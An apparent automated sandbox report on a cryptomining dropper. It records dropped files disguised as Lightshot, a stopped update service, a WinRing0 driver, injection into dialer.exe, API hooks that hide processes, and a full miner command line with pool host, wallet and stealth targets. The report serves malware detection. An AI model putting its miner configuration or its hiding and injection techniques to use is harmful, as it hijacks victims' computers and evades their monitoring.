          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
          Source: C:\ProgramData\Screenshots\Lightshot.exe Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: nW2oopMIdg.exe Static PE information: Image base 0x140000000 > 0x60000000
          Source: nW2oopMIdg.exe Static file information: File size 2876416 > 1048576
          Source: nW2oopMIdg.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x2b2000
          Source: nW2oopMIdg.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp
          Source: nW2oopMIdg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: nW2oopMIdg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: nW2oopMIdg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: nW2oopMIdg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: nW2oopMIdg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\dialer.exe Code function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 65_2_00000001408460F0
          Source: nW2oopMIdg.exe Static PE information: section name: .00cfg
          Source: Lightshot.exe.0.dr Static PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Code function: 0_2_00007FF7EB901394 push qword ptr [00007FF7EB90E004h]; ret 0_2_00007FF7EB901403
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E85896ACDD push rcx; retf 003Fh 31_2_000001E85896ACDE
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E85899C6DD push rcx; retf 003Fh 31_2_000001E85899C6DE
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E8589CACDD push rcx; retf 003Fh 31_2_000001E8589CACDE
          Source: C:\ProgramData\Screenshots\Lightshot.exe Code function: 36_2_00007FF7B1C81394 push qword ptr [00007FF7B1C8E004h]; ret 36_2_00007FF7B1C81403
          Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000140ADFDACDD push rcx; retf 003Fh 39_2_00000140ADFDACDE
          Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000140AE87C6DD push rcx; retf 003Fh 39_2_00000140AE87C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5AACDD push rcx; retf 003Fh 40_2_00000195DD5AACDE
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5DC6DD push rcx; retf 003Fh 40_2_00000195DD5DC6DE
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CA2ACDD push rcx; retf 003Fh 41_2_000001160CA2ACDE
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CA5C6DD push rcx; retf 003Fh 41_2_000001160CA5C6DE
          Source: C:\Windows\System32\dialer.exe Code function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E108ACDD push rcx; retf 003Fh 66_2_00000257E108ACDE
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E10BC6DD push rcx; retf 003Fh 66_2_00000257E10BC6DE
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C1EACDD push rcx; retf 003Fh 67_2_000001F28C1EACDE
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C94C6DD push rcx; retf 003Fh 67_2_000001F28C94C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA97FEACDD push rcx; retf 003Fh 68_2_000001CA97FEACDE
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA9855C6DD push rcx; retf 003Fh 68_2_000001CA9855C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D2652FACDD push rcx; retf 003Fh 69_2_000001D2652FACDE
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D26532C6DD push rcx; retf 003Fh 69_2_000001D26532C6DE

          Persistence and Installation Behavior

          Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\ProgramData\Screenshots\Lightshot.exe File created: C:\Windows\TEMP\yycjbdwxjaoe.sys
          Source: C:\ProgramData\Screenshots\Lightshot.exe File created: C:\Windows\Temp\yycjbdwxjaoe.sys
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe File created: C:\ProgramData\Screenshots\Lightshot.exe
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 25_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 62_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exe System information queried: FirmwareTableInformation
          Source: dialer.exe, 00000041.00000003.2138683912.000001C377300000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138482082.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3283235144.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --ALGO=RX/0 --URL=POOL.SUPPORTXMR.COM:80 --USER="46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW" --PASS="ULTIMA" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="YYCJBDWXJAOE.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=80 --CINIT-ID="IKZKMIIBPWTVHLGB"
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --ALGO=RX/0 --URL=POOL.SUPPORTXMR.COM:80 --USER="46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW" --PASS="ULTIMA" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="YYCJBDWXJAOE.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=80 --CINIT-ID="IKZKMIIBPWTVHLGB";;
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE]
          Source: dialer.exe, 00000041.00000003.2138683912.000001C377305000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138756594.000001C37730D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE=
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138683912.000001C377305000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3283235144.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138756594.000001C37730D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DIALER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:80--USER=46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW--PASS=ULTIMA--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=YYCJBDWXJAOE.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=10--CINIT-IDLE-CPU=80--CINIT-ID=IKZKMIIBPWTVHLGB1
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXET
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5522
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4342
          Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 7808
          Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 2191
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7186
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2238
          Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9909
          Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9869
          Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 1815
          Source: C:\ProgramData\Screenshots\Lightshot.exe Dropped PE file which has not been started: C:\Windows\Temp\yycjbdwxjaoe.sys
          Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_40-14927
          Source: C:\Windows\System32\dialer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_25-480
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe API coverage: 8.3 %
          Source: C:\ProgramData\Screenshots\Lightshot.exe API coverage: 8.3 %
          Source: C:\Windows\System32\lsass.exe API coverage: 8.2 %
          Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
          Source: C:\Windows\System32\dialer.exe API coverage: 1.2 %
          Source: C:\Windows\System32\svchost.exe API coverage: 4.8 %
          Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exe API coverage: 7.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796 Thread sleep count: 5522 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992 Thread sleep count: 4342 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224 Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\dialer.exe TID: 6204 Thread sleep count: 31 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 6632 Thread sleep count: 7808 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 6632 Thread sleep time: -7808000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 6632 Thread sleep count: 2191 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 6632 Thread sleep time: -2191000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092 Thread sleep count: 7186 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092 Thread sleep count: 2238 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440 Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 5968 Thread sleep count: 9909 > 30
          Source: C:\Windows\System32\lsass.exe TID: 5968 Thread sleep time: -9909000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5616 Thread sleep count: 246 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5616 Thread sleep time: -246000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 1852 Thread sleep count: 9869 > 30
          Source: C:\Windows\System32\dwm.exe TID: 1852 Thread sleep time: -9869000s >= -30000s
          Source: C:\Windows\System32\dialer.exe TID: 1576 Thread sleep count: 1815 > 30
          Source: C:\Windows\System32\dialer.exe TID: 1576 Thread sleep time: -181500s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2228 Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2228 Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3840 Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3840 Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6616 Thread sleep count: 251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6616 Thread sleep time: -251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5456 Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5456 Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
          Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
          Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
          Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001E85898DCE0 FindFirstFileExW, 31_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000140AE86DCE0 FindFirstFileExW, 39_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5CDCE0 FindFirstFileExW, 40_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CA4DCE0 FindFirstFileExW, 41_2_000001160CA4DCE0
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E10ADCE0 FindFirstFileExW, 66_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C93DCE0 FindFirstFileExW, 67_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA9854DCE0 FindFirstFileExW, 68_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D26531DCE0 FindFirstFileExW, 69_2_000001D26531DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377280000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW7
          Source: lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
          Source: svchost.exe, 00000028.00000003.2351763230.00000195DD66A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377280000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377229000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW \(w
          Source: svchost.exe, 00000044.00000002.3280283271.000001CA97800000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
